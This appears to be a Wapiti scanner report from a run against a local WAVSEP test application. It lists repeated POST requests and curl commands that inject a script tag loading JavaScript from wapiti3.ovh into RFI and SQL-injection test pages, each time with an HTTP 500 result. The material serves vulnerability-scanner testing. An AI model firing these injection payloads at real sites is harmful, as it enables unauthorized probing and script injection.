POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwl4db3dpgqz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwl4db3dpgqz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwj33jb7j3z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwj33jb7j3z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb5j8jx7cwz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb5j8jx7cwz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfjg8tf8imz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfjg8tf8imz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwefu7gr73iz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwefu7gr73iz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsy577rkllz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwsy577rkllz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwp22o8wba6z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwp22o8wba6z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwj3jzs1r8z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwj3jzs1r8z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3ymbjy8iwz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3ymbjy8iwz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwss0r7gq2ez.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwss0r7gq2ez.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrljuc8tecz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrljuc8tecz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd7dl7v4wvz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwd7dl7v4wvz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3ttfoi1hnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3ttfoi1hnz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw447u6gxymz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw447u6gxymz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt7z4qditqz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt7z4qditqz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4yqmpsod3z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4yqmpsod3z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgdjta3zy9z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -d "transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgdjta3zy9z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi3007lphnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwi3007lphnz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwruk0tstwez.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwruk0tstwez.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwepa4erwndz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwepa4erwndz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw5uuopv62bz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw5uuopv62bz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrrfa83ztcz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwrrfa83ztcz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9nj9f61w0z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9nj9f61w0z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbml0zxp0mz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbml0zxp0mz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwr5gjtzfogz.js%3E%3C%2Fscript%3E
